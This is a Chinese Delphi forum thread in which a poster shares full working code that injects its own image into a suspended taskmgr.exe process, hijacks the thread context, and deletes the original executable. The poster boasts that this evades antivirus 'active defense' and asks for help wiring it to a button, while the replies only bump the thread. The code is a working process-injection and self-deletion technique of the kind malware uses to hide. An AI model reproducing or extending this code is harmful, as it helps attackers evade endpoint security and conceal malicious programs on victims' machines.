当前位置: 代码迷 >> Delphi >> 就差最后一步了,帮帮小弟我~
  详细解决方案

就差最后一步了,帮帮小弟我~

热度:5981   发布时间:2013-02-25 00:00:00.0
就差最后一步了,帮帮我~!
以下这段代码,是我在网上找的,经过我的努力,可以实现运行后注入taskmgr.exe删除自己,而且主动防御没有反应,这是我最的,但是,我想实现:点一个按钮,再执行这段代码,好几天了,也实现不了,请帮帮我!谢谢!!!!



program SelfInjectCode; 
uses
   Windows,shellapi;
var
vbuf: array[0..MAX_PATH] of Char;

Procedure WinMain(); stdcall;
var
FileDir:string;
FileStruct:TSHFileOpStruct;
begin
LoadLibrary('shell32.dll');
sleep(1000);
FileDir:=vbuf;
FileStruct.Wnd:=0;
FileStruct.wFunc:=FO_delete;
FileStruct.pFrom:=Pchar(FileDir+#0);
FileStruct.fFlags:=FOF_NOCONFIRMATION;
SHFileOperation(FileStruct);
ExitProcess(0);

end;

var

St: TStartupInfo;
Pr: TProcessInformation;
InjectSize: dword;
Code: pointer;
Injected: pointer;
BytesWritten: dword;
Context: _CONTEXT;
const
injectprocess='taskmgr.exe';
begin
GetModuleFileName(0, vbuf, Length(vbuf));

ZeroMemory(@St, SizeOf(TStartupInfo));
St.cb := SizeOf(TStartupInfo);
St.wShowWindow := SW_SHOW;
if CreateProcess(nil, injectprocess, nil, nil, false, Create_SUSPENDED, nil, nil, St, Pr) then
begin

Code := pointer(GetModuleHandle(nil));
InjectSize := PImageOptionalHeader(pointer(integer(Code) + PImageDosHeader(Code)._lfanew +
             SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
Injected := VirtualAllocEx(Pr.hProcess, Code, InjectSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(Pr.hProcess, Injected, Code, InjectSize, BytesWritten);
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(Pr.hThread, Context);
Context.Eip := dword(@WinMain);
SetThreadContext(Pr.hThread, Context);
ResumeThread(Pr.hThread);
end;

end.

------解决方案--------------------------------------------------------
说明一点,
use 只能有这两顶,再多一顶,注入taskmgr.exe就失败!!
或者谁有相同功能的代码,给我,我也感激涕零!~~~~!
------解决方案--------------------------------------------------------
...
------解决方案--------------------------------------------------------
不太懂
------解决方案--------------------------------------------------------
不会,帮你顶上去!!
------解决方案--------------------------------------------------------
学习中..期待高手解决..
------解决方案--------------------------------------------------------
帮顶!up

------解决方案--------------------------------------------------------
谢谢大家帮顶,高手快来呀!!!
  相关解决方案